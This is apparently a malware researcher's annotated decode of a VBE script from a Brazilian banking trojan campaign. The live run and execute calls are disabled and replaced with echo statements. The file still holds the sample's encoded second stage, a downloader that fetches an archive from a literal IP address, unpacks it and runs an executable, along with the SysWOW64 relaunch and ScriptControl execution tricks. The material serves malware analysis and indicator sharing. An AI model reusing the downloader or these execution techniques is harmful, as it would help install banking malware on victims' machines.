MalwareMustDie

Banco VBE decoded

Aug 28th, 2015
  1. // shared vbe decoded beautified script
  2. // with comment - case: banco, Brazil
  3. // #MalwareMustDie
  4.  
     '// Analysis copy of the sample's first routine: the live statements below only display text.
     '// Nothing in this part launches a process; the original RUN and QUIT calls are commented out.
  5. Wscript.Echo "press to start,,,"
  6.  
  7. '// mainvar6
  8. '//SUB mainvar6
  9.  
  10. '// -------commented  all except the path check var ones..
  11.  
      '// WScript.Shell is kept live only so EXPANDENVIRONMENTSTRINGS can resolve %WINDIR% for the Echo below.
  12. SET mainvar7 = WSCRIPT.CREATEOBJECT("WSCRIPT.SHELL")
      '// The disabled lines read SystemType from Win32_ComputerSystem over WMI (ROOT\CIMV2).
  13. '// SET mainvar8 = GETOBJECT ("WINMGMTS:\\.\ROOT\CIMV2")
  14. '// SET mainvar9 = mainvar8.EXECQUERY ("SELECT * FROM WIN32_COMPUTERSYSTEM")
  15.  
  16. '// FOR EACH pcinfo0 IN mainvar9
  17. '// pcinfo1 = pcinfo0.SYSTEMTYPE
  18. '// NEXT
  19.  
      '// Disabled branch: on an "X64-BASED PC" whose host path lacks "SYSWOW64", the script restarted
      '// itself under %WINDIR%\SYSWOW64\WSCRIPT.EXE and then quit the current instance.
      '// NOTE(review): presumably this forces the 32-bit host because maincall relies on ScriptControl - confirm.
  20. '// IF (UCASE(pcinfo1) = "X64-BASED PC") AND (INSTR (UCASE(WSCRIPT.PATH),"SYSWOW64") = 0) THEN
  21. '//    mainvar7.RUN mainvar7.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\SYSWOW64\WSCRIPT.EXE "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
  22.  
      '// Prints the command line the disabled RUN call was given instead of executing it.
      '// A wscript.exe parent spawning SYSWOW64\WSCRIPT.EXE with the same script path is the process
      '// pattern that the original RUN line would produce.
  23. Wscript.Echo  mainvar7.EXPANDENVIRONMENTSTRINGS("%WINDIR%")&"\SYSWOW64\WSCRIPT.EXE "&CHR(34)&WSCRIPT.SCRIPTFULLNAME&CHR(34)
  24.  
  25. '//    WSCRIPT.QUIT
  26. '// END IF
  27.  
  28. '// ------comment end
  29.  
  30. '//END SUB
  31.  
  32. Wscript.Echo "loading var2,,,"
  33.  
      '// var2 is the encoded second stage, carried as one string literal. It is framed by ">1" at the
      '// start and ">!<" at the end, the two markers the InStr calls further down search for.
      '// Inside the literal, doubled single quotes ('') stand in for double quotes; the Replace call
      '// that builds var5 converts them back.
      '// The first assignment in the encoded text is a URL-shaped token that points at the literal IP
      '// address 5.175.145.181, which is usable as a network indicator as it appears here.
      '// NOTE(review): the token ''var6'' inside the literal matches the value given to nextvar0 below;
      '// it looks like an analyst-side rename replaced part of the original text - confirm against the
      '// raw sample before treating this copy as byte-exact.
      '// NOTE(review): the literal is broken across two physical lines in this paste; VBScript string
      '// literals cannot span lines, so the break is presumably a paste artifact - confirm.
  34. var2 = ">1yvf = ''shhn://5.175.145.181/fkyvec/ehrwjhw.zrn''jwh bjswff = ovwuhwbekwoh(''ajovrnh.jswff'')jwh gjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')jhvsbpwgbflwv = bjswff.wdnutlwtirvbtpwthjhvrtcj(''%unnluhu%'')gbflwvtupw = jhvsbpwgbflwv + ''\'' + vutlbpjhvrtc() + ''\''jwh bgjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')rg tbh bgjb.gbflwvwdrjhj(gbflwvtupw) hswtjwh bekgbflwv = bgjb.ovwuhwgbflwv(gbflwvtupw)wtl rgnyjs_hb = gbflwvtupw & vutlbpjhvrtc() & ''.zrn''nyjs yvf,nyjs_hbzrngrfw= nyjs_hbwdhvuohhb= gbflwvtupwjwh gjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')rg tbh gjb.gbflwvwdrjhj(wdhvuohhb) hswt   gjb.ovwuhwgbflwv(wdhvuohhb)wtl rgjwh bekjswff = ovwuhwbekwoh(''jswff.unnfrouhrbt'')jwh grfwjrtzrn=bekjswff.tupwjnuow(zrngrfw).rhwpjbekjswff.tupwjnuow(wdhvuohhb).obnxswvw(grfwjrtzrn)jwh gjb = tbhsrtcjwh bekjswff = tbhsrtctwa_grfw_tupw = vutlbpjhvrtc() & ''.wdw''jwh gjb = ovwuhwbekwoh(''jovrnhrtc.grfwjxjhwpbekwoh'')jwh bgflv = gjb.cwhgbflwv(gbflwvtupw)gbv wuos bgrfw rt bgflv.grfwj rg foujw(gjb.cwhwdhwtjrbttupw(bgrfw.tupw)) = ''hdh'' hswt  bgrfw.tupw = twa_grfw_tupw  wdrh gbv wtl rgtwdhjwh bekjswff = ajovrnh.ovwuhwbekwoh( ''ajovrnh.jswff'' )bekjswff.wdwo(gbflwvtupw & twa_grfw_tupw)'tbpw obvvwhb lb wdwjwh bekjswff = tbhsrtcjye nyjs( pxgrfwyvf, pxlwjhgrfw )lrp dshhn: jwh dshhn = ovwuhwbekwoh(''provbjbgh.dpfshhn'')lrp ejhvp: jwh ejhvp = ovwuhwbekwoh(''ulble.jhvwup'')dshhn.bnwt ''cwh'', pxgrfwyvf, gufjwdshhn.jwtlarhs ejhvp    .hxnw = 1 '//ertuvx    .bnwt    .avrhw dshhn.vwjnbtjweblx    .juiwhbgrfw pxlwjhgrfw, 2 '//biwvavrhwwtl arhswtl jyegytohrbt vutlbpjhvrtc()    vutlbprzw()    lrp osuvuohwvjwhuvvux    osuvuohwvjwhuvvux = uvvux(_        uvvux(7, ''var6''), _        uvvux(1, ''0123456789'') _    )    lrp r    lrp k    lrp obyth    lrp osuvj    lrp rtlwd    lrp hwpn    gbv r = 0 hb yebytl(osuvuohwvjwhuvvux)        obyth = osuvuohwvjwhuvvux(r)(0)        osuvj = osuvuohwvjwhuvvux(r)(1)        gbv k = 1 hb obyth            rtlwd = rth(vtl() * fwt(osuvj)) + 1   
         hwpn = hwpn & prl(osuvj, rtlwd, 1)        twdh    twdh    lrp hwpnobnx    lb ythrf fwt(hwpn) = 0        rtlwd = rth(vtl() * fwt(hwpn)) + 1        hwpnobnx = hwpnobnx & prl(hwpn, rtlwd, 1)        hwpn = prl(hwpn, 1, rtlwd - 1) & prl(hwpn, rtlwd + 1)    fbbn    vutlbpjhvrtc = hwpnobnxwtl gytohrbt>!<"
  35.  
      '// Displays the still-encoded text; nothing has been decoded or executed at this point.
  36. Wscript.Echo var2
  37.  
      '// Carves the encoded body out of var2, runs it through the per-character loop, and passes the
      '// result to maincall.
  38. Wscript.Echo "decoding var2,,,"
  39.  
      '// chr(62) is ">" and Chr(60) is "<": var1 is the position of the ">1" start marker and var3 the
      '// position of the ">!<" end marker.
  40. var1 = InStr(var2,chr(62) & "1")
  41. var3 = InStr(var2,chr(62) & "!" & Chr(60))
      '// var4 becomes the number of characters between the two ">" characters; var1 + 1 steps past the
      '// leading ">" so the slice starts at the "1".
  42. var3 = var3 -1
  43. var4 = var3 - var1
  44. var1 = var1 + 1
      '// Takes the slice and turns each doubled single quote ('') back into a double quote.
  45. var5 = Replace(Mid(var2,var1,var4),"''","""")
  46. nextvar0="var6"
  47. nextvar1=var5
  48.  
      '// The loop starts at 2, which skips the "1" left at the front of the slice.
      '// nextvar2 is never assigned anywhere in this listing, so as shown InStr(nextvar2, ...) yields 0
      '// for every character, the Else branch always runs, and nextvar5 ends up as var5 minus its
      '// first character with no substitution applied.
      '// NOTE(review): nextvar0 holds only the placeholder "var6" and the arguments of the instr/mid
      '// pair in the If branch look transposed; presumably the two substitution alphabets were removed
      '// or renamed in this shared copy, so the listing does not reproduce the sample's decoding - confirm.
  49. for nextvar3=2 to len(nextvar1)
  50. nextvar4=mid(nextvar1,nextvar3,1)
  51. if instr(nextvar2,nextvar4) then
  52.      xxx = instr(nextvar0,nextvar4)
  53.      yyy = mid(xxx , nextvar2 , 1)
  54.      nextvar5 = nextvar5 & yyy
  55. else
  56.      nextvar5=nextvar5&nextvar4
  57. end if
  58. next
  59.  
      '// Split with a zero-length delimiter returns a one-element array holding the whole string, so
      '// maincall receives the full text as a single item.
  60. maincall(split(nextvar5,""))
  61. 'MrZer0
  62.  
      '// maincall(pcinfo): joins the items of pcinfo with CRLF and, in this analysis copy, only
      '// displays the result. pcinfo is the array produced by the split(...) call at the call site.
      '// The function never assigns its own name, so it returns no value.
  63. Function maincall(pcinfo)
      '// The ScriptControl COM object is still created and configured for VBScript, with the wscript
      '// host object exposed to it under the name "wscript".
      '// Instantiation of ScriptControl by a script host is therefore observable even in this copy.
  64. Set badness = CreateObject("ScriptControl")
  65. badness.Language = "VBScript"
  66. badness.addobject "wscript",wscript
      '// -1 turns off the control's script timeout.
  67. badness.TimeOut = -1
  68.  
      '// Concatenates every item of pcinfo, each followed by a CRLF.
  69. For each i in pcinfo
  70.   shits = shits & i & vbcrlf
  71. next
  72.  
      '// Execution point of the original: addcode handed the decoded text to the ScriptControl.
      '// It is commented out here, so the text is never run.
  73. '//badness.addcode(shits)
  74.  
      '// Analyst replacement for addcode: shows the joined text instead of running it.
  75. Wscript.Echo shits
  76.  
  77. end function
  78. [EOF]